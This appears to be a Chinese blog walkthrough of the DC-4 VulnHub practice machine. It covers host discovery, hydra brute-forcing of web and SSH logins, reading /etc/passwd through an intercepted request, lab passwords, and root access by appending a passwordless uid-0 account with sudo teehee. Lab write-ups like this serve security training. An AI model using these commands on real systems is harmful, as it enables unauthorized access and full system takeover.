DC-4--vulnhub靶场

靶机地址

网络:NAT

目录

1、主机发现

2、端口扫描

3、网站识别

 4、使用burp suite抓包,改包

5、使用22端口的ssh,hydra爆破

6、提权

 7、总结


 

1、主机发现

-sn: Ping Scan - disable port scan

nmap 192.168.194.0/24 -sn 

基于ARP协议

arp-scan -l 

netdiscover -r 192.168.194.0/24    

 

 确定靶机IP为192.168.194.162

2、端口扫描

nmap -sV -A -p- 192.168.194.162

 e2e3025bc65d4745be8b9b7160a01713.png

22/tcp open  ssh 

80/tcp open  http   

3、网站识别

有一个登录框,账号为admin,没有验证码,尝试弱口令爆破

19074ee6c9594b7dbdfdb784268ac0ad.png

 whatweb http://192.168.194.162

dirb http://192.168.194.162 -X .txt,.php,zip

没有找到有用信息,尝试爆破,使用kali自带的

工具hydra

字典/usr/share/wordlists/rockyou.txt.gz

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz 192.168.194.162 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

e7e3e085bfbc47bab241c705a0095f32.png

 账号admin

密码happy

bd610c525b0c45e28a9a5dce1b3667a3.png

 4、使用burp suite抓包,改包

85d362799d0b47b596b6aa37bb11948a.png

 查看/etc/passwd,/etc/passwd文件内容非常规律,每行记录对应一个用户。 每行用户信息都以":"作为分隔符,划分为7个字段。参考

d365b6d4f3d24255a7d92d317777155f.png

charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash

得到3个普通用户,

charles
jim
sam

切换用户一个个查看,发现密码集,

cat /home/jim/backups/old-passwords.bak

8a9e2234c69a4a1a84b82703c61d8713.png

 

5、使用22端口的ssh,hydra爆破

-t 指定线程

hydra -L users.txt -P passwd.txt 192.168.194.162 ssh

login: jim  

password: jibril04
 

14a69c6e739d483d927889548d9f2956.png

6、提权

 You have mail.

查看mail,发现账号charles 密码 ^xHhA&hvim0y

2a5d2727a0a4464087824117e9f25d6a.png

a57a7c61c5ae414bb423ed2f65fe78bb.png 

 sudo -l查看权限,发现可以不需要密码执行teehee(root权限),teehee可以来向其他文件写入内容

先介绍下/etc/passwd中不同字段的含义,参考

用户名:口令:用户标识号(uid):组标识号(gid):注释说明:用户主目录:命令解释程序

echo "admin0::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

b9b309cc3e0f4db4963d54e546b9187a.png

 7、总结

  • 使用hydra进行网站登录爆破,之前一直用burp suite
  • teehee提权是使用teehee -a 把一个账号密码写入到etc/passwd中

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值